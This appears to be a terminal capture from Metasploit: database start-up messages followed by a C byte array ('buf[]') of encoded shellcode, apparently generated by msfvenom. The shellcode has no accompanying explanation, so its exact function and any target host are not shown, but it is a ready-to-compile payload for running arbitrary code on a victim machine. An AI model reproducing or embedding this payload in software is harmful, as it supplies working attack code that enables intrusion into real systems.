Found a database at /Users/david/.msf4/db, checking to see if it is started
Starting database at /Users/david/.msf4/db...success
unsigned char buf[] = 
"\xda\xd6\xd9\x74\x24\xf4\x5b\xb8\xc6\x7f\xdc\x1a\x2b\xc9\xb1"
"\x52\x31\x43\x17\x83\xeb\xfc\x03\x85\x6c\x3e\xef\xf5\x7b\x3c"
"\x10\x05\x7c\x21\x98\xe0\x4d\x61\xfe\x61\xfd\x51\x74\x27\xf2"
"\x1a\xd8\xd3\x81\x6f\xf5\xd4\x22\xc5\x23\xdb\xb3\x76\x17\x7a"
"\x30\x85\x44\x5c\x09\x46\x99\x9d\x4e\xbb\x50\xcf\x07\xb7\xc7"
"\xff\x2c\x8d\xdb\x74\x7e\x03\x5c\x69\x37\x22\x4d\x3c\x43\x7d"
"\x4d\xbf\x80\xf5\xc4\xa7\xc5\x30\x9e\x5c\x3d\xce\x21\xb4\x0f"
"\x2f\x8d\xf9\xbf\xc2\xcf\x3e\x07\x3d\xba\x36\x7b\xc0\xbd\x8d"
"\x01\x1e\x4b\x15\xa1\xd5\xeb\xf1\x53\x39\x6d\x72\x5f\xf6\xf9"
"\xdc\x7c\x09\x2d\x57\x78\x82\xd0\xb7\x08\xd0\xf6\x13\x50\x82"
"\x97\x02\x3c\x65\xa7\x54\x9f\xda\x0d\x1f\x32\x0e\x3c\x42\x5b"
"\xe3\x0d\x7c\x9b\x6b\x05\x0f\xa9\x34\xbd\x87\x81\xbd\x1b\x50"
"\xe5\x97\xdc\xce\x18\x18\x1d\xc7\xde\x4c\x4d\x7f\xf6\xec\x06"
"\x7f\xf7\x38\x88\x2f\x57\x93\x69\x9f\x17\x43\x02\xf5\x97\xbc"
"\x32\xf6\x7d\xd5\xd9\x0d\x16\x76\x0d\x74\xe7\xee\x2c\x86\xf6"
"\xb2\xb9\x60\x92\x5a\xec\x3b\x0b\xc2\xb5\xb7\xaa\x0b\x60\xb2"
"\xed\x80\x87\x43\xa3\x60\xed\x57\x54\x81\xb8\x05\xf3\x9e\x16"
"\x21\x9f\x0d\xfd\xb1\xd6\x2d\xaa\xe6\xbf\x80\xa3\x62\x52\xba"
"\x1d\x90\xaf\x5a\x65\x10\x74\x9f\x68\x99\xf9\x9b\x4e\x89\xc7"
"\x24\xcb\xfd\x97\x72\x85\xab\x51\x2d\x67\x05\x08\x82\x21\xc1"
"\xcd\xe8\xf1\x97\xd1\x24\x84\x77\x63\x91\xd1\x88\x4c\x75\xd6"
"\xf1\xb0\xe5\x19\x28\x71\x05\xf8\xf8\x8c\xae\xa5\x69\x2d\xb3"
"\x55\x44\x72\xca\xd5\x6c\x0b\x29\xc5\x05\x0e\x75\x41\xf6\x62"
"\xe6\x24\xf8\xd1\x07\x6d";
